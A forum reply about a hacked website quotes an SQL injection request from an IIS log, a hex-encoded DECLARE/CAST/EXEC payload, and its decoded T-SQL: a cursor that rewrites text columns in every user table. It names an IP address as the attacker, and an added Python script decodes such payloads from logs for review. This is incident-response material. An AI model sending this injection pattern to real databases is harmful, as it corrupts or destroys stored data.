RE: Hacked - what's the best way to restore?

  • We had the same problem on 25 September. I found an SQL injection in the IIS log:

    DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C41524520405420564152434841522832353529220.............%20AS%20VARCHAR(4000));EXEC(@S)

    I converted this text from hex format. Look:

    DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=LEFT(CONVERT(VARCHAR(4000),['+@C+']),PATINDEX(''%<scr%'',CONVERT(VARCHAR(4000),['+@C+']))-1) WHERE PATINDEX(''%<scr%'',CONVERT(VARCHAR(4000),['+@C+']))>0') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

    The attack was from 41.196.146.57

    Information about this IP:

    Hostname: host-41-196-146-57.static.link.com.eg

    ISP: Link Egypt

    Organization: Link Egypt

    Proxy: None detected

    Type: Unknown

    Geo-Location Information

    Country: Egypt

    State/Region: 11

    City: Cairo

    Latitude: 30.05

    Longitude: 31.25

    This IP is listed in many blacklists (for example dnsbl-3.uceprotect.net, cbl.abuseat.org).
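
The decoding step described in the post above (URL-decode the logged query string, then turn the hex inside `CAST(0x... AS VARCHAR)` back into text) can be automated when reviewing IIS logs. This is an added example, not part of the original post: the function names and the sample log lines are constructed for illustration, and it goes slightly beyond the post by also decoding `NVARCHAR` (UTF-16) payloads.

```python
import re
from urllib.parse import unquote_plus

# Pattern from the logged request: CAST(0x<hex> AS VARCHAR(n)), or NVARCHAR
CAST_HEX = re.compile(r"CAST\s*\(\s*0x([0-9A-F]+)\s+AS\s+(N?)VARCHAR", re.IGNORECASE)

def decode_cast_payloads(log_line):
    """Return the decoded text of every CAST(0x... AS [N]VARCHAR) in a line."""
    decoded = []
    text = unquote_plus(log_line)  # %20 and + both become spaces
    for match in CAST_HEX.finditer(text):
        hex_blob, is_nvarchar = match.group(1), match.group(2)
        if len(hex_blob) % 2:
            hex_blob = hex_blob[:-1]  # truncated log field: drop the odd nibble
        raw = bytes.fromhex(hex_blob)
        encoding = "utf-16-le" if is_nvarchar else "latin-1"
        decoded.append(raw.decode(encoding, errors="replace"))
    return decoded

def scan_iis_log(lines):
    """Return (line_number, decoded_sql) for each hex-encoded payload found."""
    hits = []
    for number, line in enumerate(lines, start=1):
        if line.startswith("#"):  # W3C log directives (#Fields, #Date, ...)
            continue
        for sql in decode_cast_payloads(line):
            hits.append((number, sql))
    return hits

# Constructed sample input: harmless statement, documentation-range addresses.
_payload = "SELECT 'constructed sample'"
SAMPLE_LOG = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status",
    "2000-01-01 10:00:00 192.0.2.1 GET /page.asp id=1 80 192.0.2.10 200",
    "2000-01-01 10:00:01 192.0.2.1 GET /page.asp "
    "id=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
    + _payload.encode("ascii").hex().upper()
    + "%20AS%20VARCHAR(4000));EXEC(@S) 80 192.0.2.10 200",
]

if __name__ == "__main__":
    for number, sql in scan_iis_log(SAMPLE_LOG):
        print(f"line {number}: {sql}")
```

Any hit in a real log marks a request to review: the client IP and timestamp on that line show who sent it and when, and the decoded SQL shows which tables and columns to check before deciding how far back to restore.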